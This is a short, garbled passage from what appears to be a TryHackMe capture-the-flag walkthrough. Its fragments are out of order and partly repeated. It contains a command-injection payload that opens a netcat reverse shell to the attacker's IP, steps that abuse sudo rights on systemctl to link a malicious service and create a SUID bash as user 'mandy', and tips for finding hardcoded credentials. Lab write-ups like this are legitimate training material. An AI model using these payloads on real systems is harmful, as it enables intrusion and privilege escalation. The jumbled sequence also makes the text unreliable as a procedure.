sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy .
[Install] WantedBy=multi-user.target
Run:
Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see: cct2019 tryhackme
127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use: sudo -u mandy /bin/systemctl link /home/www-data/privesc